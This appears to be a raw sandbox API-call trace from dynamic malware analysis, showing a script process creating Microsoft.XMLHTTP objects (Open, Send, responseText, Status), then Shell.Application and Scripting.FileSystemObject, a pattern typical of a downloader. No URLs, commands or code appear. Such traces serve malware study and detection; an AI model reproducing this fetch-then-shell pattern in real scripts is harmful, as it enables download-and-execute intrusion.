	[0499.281] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0499.281] SysStringLen (param_1=0x0) returned 0x0
	[0499.281] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0499.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0499.281] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0499.281] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0499.281] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0499.281] ??2@YAPEAX_K@Z () returned 0x62f310
	[0499.281] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0499.281] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0499.281] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0499.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0499.282] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0499.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.282] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0499.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0499.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0499.282] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0499.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0500.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0500.999] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0500.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0500.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0500.999] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0500.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0500.999] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0500.999] SysStringLen (param_1=0x0) returned 0x0
	[0500.999] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0501.000] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0501.000] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0501.000] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0501.000] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0501.000] ??2@YAPEAX_K@Z () returned 0x62f350
	[0501.000] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0501.000] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0501.000] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0501.000] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0501.000] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0501.000] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0501.000] SysStringLen (param_1=0x0) returned 0x0
	[0501.000] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0501.004] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0501.004] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0501.004] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0501.004] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0501.004] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0501.004] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0501.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0501.672] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0501.672] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0501.673] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0501.673] SysStringLen (param_1=0x0) returned 0x0
	[0501.674] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0501.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0501.674] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0501.674] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0501.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0501.674] ??2@YAPEAX_K@Z () returned 0x62f310
	[0501.674] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0501.674] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0501.674] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0501.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0501.674] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0501.674] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.674] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0501.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0501.677] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0501.677] SysStringLen (param_1=0x0) returned 0x0
	[0501.677] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0501.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0501.677] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0501.677] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0501.677] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0501.678] ??2@YAPEAX_K@Z () returned 0x62f330
	[0501.678] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0501.678] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0501.678] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0501.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0501.678] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0501.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.678] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0501.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0501.678] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0501.678] SysStringLen (param_1=0x0) returned 0x0
	[0501.678] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0501.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0501.678] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0501.678] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0501.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0501.679] ??2@YAPEAX_K@Z () returned 0x62f310
	[0501.679] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
	[0501.679] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0501.679] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0501.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0501.679] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0501.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.679] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0501.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
